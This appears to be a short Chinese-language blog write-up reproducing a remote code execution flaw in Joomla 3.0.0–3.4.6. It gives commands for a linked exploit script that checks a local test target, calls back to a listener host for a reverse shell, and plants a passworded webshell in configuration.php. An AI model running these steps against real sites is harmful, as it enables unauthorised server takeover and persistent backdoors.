# Joomla 3.4.6 configuration.php 远程代码执行
### 一、漏洞简介
Joomla 3.4.6 – ‘configuration.php’ Remote Code Execution
### 二、影响范围
Joomla 3.0.0 至 3.4.6
### 三、复现过程
`https://github.com/ianxtianxt/Joomla-3.4.6—configuration.php-Remote-Code-Execution`
**脚本验证**
验证:
“`bash
python3 test.py -t http://127.0.0.1:8080/
“`
显示“Vulnerable”证明存在漏洞
利用:
“`bash
python3 test.py -t http://127.0.0.1:8080/ –exploit –lhost 192.168.31.126 –lport 2121
“`
执行成功
并在`“configuration.php”`写入随机密码的一句话木马
上图的密码为:`kyevgbxjmwivdvegohfzwuukuzswxqquthlrsollpxzgiifumi`
蚁剑链接测试
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
暂无评论内容